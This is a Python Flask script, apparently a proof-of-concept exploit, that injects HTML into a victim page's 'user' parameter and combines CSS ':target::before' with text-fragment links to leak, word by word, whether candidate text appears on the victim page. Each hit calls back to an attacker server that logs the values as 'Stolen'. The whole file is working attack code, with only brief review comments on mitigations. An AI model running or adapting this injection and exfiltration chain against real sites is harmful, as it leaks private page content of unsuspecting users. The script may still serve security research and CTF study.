poc3_exploit.py
from flask import Flask
from flask import request
import sys
# Flask application that serves every page of this proof of concept.
app = Flask(__name__)

# Base URLs of the two hosts involved. VICTIM is the page whose `user` query
# parameter receives the markup; ATTACKER is this server, which the markup
# points back to.
VICTIM = "http://victim:5000"
ATTACKER = "http://attacker:1337"

# Candidate words; the /redirect route hands out one per request, in order.
fruits_all = [
    "Apple",
    "Apricot",
    "Avocado",
    "Banana",
    "Bilberry",
    "Blackberry",
    "Blackcurrant",
    "Blueberry",
    "Boysenberry",
    "Currant",
    "Cherry",
    "Cherimoya",
]
def gen_redirect(try_fruit):
    """Return the HTML page that tests the victim page for one candidate word.

    The returned script sends the browser to ``VICTIM`` with markup placed in
    the ``user`` query parameter. That markup carries three pieces:

    * a ``<style>`` rule whose ``:target::before`` content is a URL under
      ``ATTACKER/receive/<try_fruit>``;
    * an anchor whose ``href`` is the text-fragment directive
      ``#:~:text=<try_fruit>``;
    * a ``<meta http-equiv="refresh">`` that returns to ``ATTACKER/redirect``
      after one second, which requests the next candidate.

    Args:
        try_fruit: candidate word, interpolated unescaped into both the URL
            and the ``href``.

    Returns:
        The page as a string.
    """
    # NOTE(review): the chain presumably depends on the victim reflecting
    # `user` into its HTML without encoding - the victim code is not visible
    # here. HTML-encoding that parameter, or a CSP that blocks inline <style>
    # and cross-origin content/image loads, would be the matching mitigations
    # to verify on the victim side.
    page = f"""<script>
let injection = `
<style>:target::before {{ content : url({ATTACKER}/receive/{try_fruit}) }}</style>
<div id="cookie-bar">
<a href="#:~:text={try_fruit}" class="cb-disable"></a>
</div>
<meta http-equiv="refresh" content="1;URL='{ATTACKER}/redirect'">`.replaceAll('\\n', ' ');
location = `{VICTIM}/?user=${{encodeURIComponent(injection)}}`;
</script>
"""
    return page
# Words reported back through the /receive/<word> route, in arrival order.
extracted_fruits = []

# Count of /redirect requests served so far. It is process-wide state shared
# by every client, not tracked per session.
i = 0
@app.route('/redirect')
def redirect():
    """Serve the page for the next candidate word, or a closing message.

    Each request advances the module-level counter ``i`` by one. While
    candidates remain, the response is ``gen_redirect`` for the word at the
    previous counter value; once the list is exhausted the fixed closing
    string is returned.
    """
    global i
    # The counter is global, so concurrent or repeated visitors all consume
    # the same sequence.
    position = i
    i += 1
    if position >= len(fruits_all):
        return "Thank you for cooperation"
    return gen_redirect(fruits_all[position])
@app.route('/')
def solve():
    """Serve the landing page that starts the sequence on a user click.

    The page installs an ``onclick`` handler. When it fires, the browser is
    navigated to ``VICTIM`` with a ``<meta http-equiv="refresh">`` tag in the
    ``user`` query parameter, pointing at ``ATTACKER/redirect`` with a zero
    second delay.
    """
    # NOTE(review): the navigation is tied to a click, presumably to obtain a
    # user gesture before the first redirect - confirm against the victim
    # setup.
    landing_page = f"""Check this out!<script>
onclick = () => {{
let injection = `<meta http-equiv="refresh" content="0;URL='{ATTACKER}/redirect'">`;
let url = `{VICTIM}/?user=`;
location = url + encodeURIComponent(injection);
}}
</script>
"""
    return landing_page
@app.route('/receive/<word>')
def receiver(word):
    """Record a word reported through the callback URL and log the full list.

    Args:
        word: path segment taken from the request URL. It is stored as
            received, with no check that it is one of ``fruits_all``.

    Returns:
        The literal string ``"ok"``.
    """
    # Any client that can reach this route can append values, and the list is
    # never trimmed.
    extracted_fruits.append(word)
    print("Stolen: ", extracted_fruits, file=sys.stdout, flush=True)
    return "ok"